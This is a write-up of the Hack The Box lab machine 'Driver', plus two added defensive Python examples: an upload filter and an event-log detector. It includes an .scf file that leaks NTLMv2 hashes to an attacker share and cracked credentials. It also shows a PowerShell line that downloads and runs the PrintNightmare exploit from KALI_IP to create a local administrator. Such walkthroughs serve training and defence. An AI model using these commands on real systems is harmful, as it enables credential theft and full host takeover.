Driver (HTB – Easy)

This machine exposes an IIS web application and SMB/WinRM services. Initial access is obtained by abusing a file upload feature to capture an NTLMv2 hash via a crafted .scf file. The captured hash is cracked to obtain valid credentials for WinRM. Privilege escalation is performed using the PrintNightmare (CVE-2021-1675) exploit to create a new local administrator.

Overview

Target: 10.129.95.238
Main vector: NTLM capture via .scf upload
Privilege escalation: PrintNightmare (CVE-2021-1675)

Enumeration

Nmap:

80/tcp   http (IIS 10.0)
135/tcp  msrpc
445/tcp  smb
5985/tcp winrm

SMB checks:

$ crackmapexec smb 10.129.95.238
$ smbclient -L 10.129.95.238 -N
$ smbmap -H 10.129.95.238 -u 'null'

The web application (MFP Firmware Update Center) allows file uploads. A Shell Command File (.scf) can be used to trigger an outbound SMB connection and capture NTLMv2.

NTLM Capture via .scf Upload

Start SMB listener on attacker:

$ impacket-smbserver smbFolder $(pwd) -smb2support

Create pentestlab.scf:

[Shell]
Command=2
IconFile=\\KALI_IP\smbFolder\pentestlab.ico

[Taskbar]
Command=ToggleDesktop

Upload the .scf file through the web interface. When Windows on the target renders the folder containing the file and resolves the IconFile UNC path, it connects back to the attacker SMB share and leaks an NTLMv2 hash for user tony.
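The upload handler is the part a defender controls here. As an added example (not code from this writeup or from the Driver box), the following Python check runs before a file is stored on a share that users browse: it blocks Explorer-parsed extensions (.scf, .url, .lnk), parses INI-style content regardless of the extension so a renamed SCF is still caught, and rejects anything whose IconFile or URL value points at a UNC path. The sample SCF is a constructed copy of the one above with the attacker host left as the KALI_IP placeholder; the helper names are assumptions of this example.

```python
import os
import re
from dataclasses import dataclass, field

# Extensions Explorer parses as shortcut/INI-like files; rendering a folder that
# holds one can make Windows fetch a remote icon over SMB (the .scf trick above).
RISKY_EXTENSIONS = {".scf", ".url", ".lnk"}
# INI keys in those formats that may reference a remote resource.
REMOTE_KEYS = {"iconfile", "url"}
# \\host\share... : two leading backslashes, a host name, a separator.
UNC_RE = re.compile(r"\\\\[^\\\s]+\\")


@dataclass
class UploadVerdict:
    allowed: bool = True
    reasons: list = field(default_factory=list)

    def block(self, why: str) -> None:
        self.allowed = False
        self.reasons.append(why)


def decode_text(data: bytes) -> str:
    """Decode uploaded bytes tolerantly, honouring UTF-16/UTF-8 BOMs."""
    for bom, enc in ((b"\xff\xfe", "utf-16-le"), (b"\xfe\xff", "utf-16-be"),
                     (b"\xef\xbb\xbf", "utf-8-sig")):
        if data.startswith(bom):
            return data.decode(enc, errors="ignore").lstrip("\ufeff")
    return data.decode("utf-8", errors="ignore")


def parse_ini(text: str):
    """Minimal tolerant INI parser -> list of (section, key, value); keys lower-cased."""
    entries, section = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif "=" in line:
            key, value = line.split("=", 1)
            entries.append((section, key.strip().lower(), value.strip()))
    return entries


def inspect_upload(filename: str, data: bytes) -> UploadVerdict:
    """Decide whether an uploaded file may be stored on a share users browse."""
    verdict = UploadVerdict()
    # Windows ignores trailing dots/spaces in names, so strip them before checking.
    ext = os.path.splitext(filename.lower().rstrip(". "))[1]
    if ext in RISKY_EXTENSIONS:
        verdict.block(f"extension {ext} is parsed by Explorer")
    entries = parse_ini(decode_text(data))
    # SCF content is dangerous whatever the name says: catch a renamed file too.
    if any(s == "shell" and k == "command" for s, k, _ in entries):
        verdict.block("SCF [Shell] Command= content detected")
    for section, key, value in entries:
        if key in REMOTE_KEYS and UNC_RE.search(value):
            verdict.block(f"{key} in [{section}] references UNC path {value}")
    return verdict


# Constructed sample: a copy of the .scf from the writeup, KALI_IP left as placeholder.
SAMPLE_SCF = (
    b"[Shell]\r\n"
    b"Command=2\r\n"
    b"IconFile=\\\\KALI_IP\\smbFolder\\pentestlab.ico\r\n"
    b"\r\n"
    b"[Taskbar]\r\n"
    b"Command=ToggleDesktop\r\n"
)

if __name__ == "__main__":
    for name, blob in (("pentestlab.scf", SAMPLE_SCF),
                       ("firmware.bin", SAMPLE_SCF),          # renamed, same content
                       ("firmware_v2.bin", b"\x7fELF\x02\x01")):
        v = inspect_upload(name, blob)
        print(name, "ALLOWED" if v.allowed else "BLOCKED", v.reasons)
```

The content check matters more than the extension check: the firmware portal in this box accepts arbitrary names, and Explorer only needs the file to land on a browsed share with a risky extension, so rejecting by extension alone still leaves the UNC-referencing content to be renamed later by anyone with write access.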

Crack the hash:

$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
-> tony : liltony

Foothold

Validate credentials:

$ crackmapexec smb 10.129.95.238 -u 'tony' -p 'liltony'
$ crackmapexec winrm 10.129.95.238 -u 'tony' -p 'liltony'
-> [Pwn3d!] (tony is in Remote Management Users)

WinRM shell:

$ evil-winrm -i 10.129.95.238 -u 'tony' -p 'liltony'

User access is obtained and user.txt can be read.

Privilege Escalation (PrintNightmare)

Privilege enumeration (e.g. with winPEAS) reveals a vulnerable print spooler configuration. PrintNightmare (CVE-2021-1675) can be used for local privilege escalation.

Get the exploit (PowerShell implementation, e.g. Invoke-Nightmare):

# On attacker
# raw file URL (the repository page itself is HTML); default branch assumed to be main
$ wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1 -O CVE-2021-1675.ps1
$ python3 -m http.server 80

On the victim (from the WinRM session):

PS> IEX (New-Object Net.WebClient).DownloadString('http://KALI_IP/CVE-2021-1675.ps1')
PS> Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"

This creates a new local user john with administrative privileges.
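From the blue-team side the artefact that matters is not the shell but what it changed: a local account appears and lands in Administrators, created by the spooler service rather than by an interactive admin. As an added example (not part of the writeup and not code from the exploit repository), the Python below correlates Security events 4720 (user account created) and 4732 (member added to a security-enabled local group) within a short window, and raises severity when a PrintService/Operational event 316 (printer driver added or updated) precedes them or when the creating subject is SYSTEM. The event lines are constructed and flattened to key=value; the field names are a simplified assumption rather than the real Windows XML schema, and the function names are this example's own.

```python
from datetime import datetime, timedelta

# Constructed sample events in a flat "timestamp key=value ..." form (assumed
# schema, not the box's real logs). Driver name mirrors the writeup's -DriverName.
SAMPLE_EVENTS = [
    "2021-10-02T14:03:11Z Channel=Security EventID=4624 SubjectUser=tony LogonType=3",
    "2021-10-02T14:05:38Z Channel=Microsoft-Windows-PrintService/Operational EventID=316 DriverName=Xerox",
    "2021-10-02T14:05:40Z Channel=Security EventID=4720 SubjectUser=SYSTEM TargetUser=john",
    "2021-10-02T14:05:41Z Channel=Security EventID=4732 SubjectUser=SYSTEM MemberName=john GroupName=Administrators",
    "2021-10-02T16:20:05Z Channel=Security EventID=4720 SubjectUser=Administrator TargetUser=svc_backup",
    "2021-10-02T16:20:09Z Channel=Security EventID=4732 SubjectUser=Administrator MemberName=svc_backup GroupName=Users",
]


def parse_event(line: str) -> dict:
    """Parse one flattened event line into a dict with a datetime under 'ts'."""
    ts, *fields = line.split()
    event = {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")}
    for f in fields:
        key, _, value = f.partition("=")
        event[key] = value
    return event


def detect_spooler_admin_creation(lines, window=timedelta(minutes=10)):
    """Flag 4720 (account created) followed by 4732 into Administrators within
    `window`. Severity is raised when a print driver install (316) happened
    shortly before, or when SYSTEM (i.e. a service, not a person) did the creating."""
    events = sorted((parse_event(l) for l in lines), key=lambda e: e["ts"])
    alerts = []
    for created in events:
        if created.get("EventID") != "4720":
            continue
        t0, user = created["ts"], created.get("TargetUser")
        admin_adds = [e for e in events
                      if e.get("EventID") == "4732"
                      and e.get("MemberName") == user
                      and e.get("GroupName") == "Administrators"
                      and t0 <= e["ts"] <= t0 + window]
        if not admin_adds:
            continue
        drivers = [e for e in events
                   if e.get("EventID") == "316"
                   and t0 - window <= e["ts"] <= t0]
        created_by = created.get("SubjectUser")
        alerts.append({
            "user": user,
            "created_at": t0,
            "created_by": created_by,
            "driver": drivers[-1].get("DriverName") if drivers else None,
            "severity": "high" if drivers or created_by == "SYSTEM" else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_spooler_admin_creation(SAMPLE_EVENTS):
        print(alert)
```

The 4720/4732 pair alone is a routine admin action, which is why it is only "medium" on its own; the spooler driver install immediately before, and SYSTEM as the creating subject, are what turn it into the PrintNightmare pattern. Disabling the Print Spooler service on hosts that do not print, which winPEAS-style enumeration surfaces as the weak configuration here, removes the path entirely.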

Connect as the new admin:

$ evil-winrm -i 10.129.95.238 -u 'john' -p 'SuperSecure'
-> root.txt

Conclusion

The machine combines NTLMv2 hash capture via a malicious .scf upload with a classic Windows local privilege escalation (PrintNightmare). After capturing and cracking Tony's NTLMv2 hash, WinRM access is obtained, and the print spooler vulnerability is abused to create a new local administrator and fully compromise the host.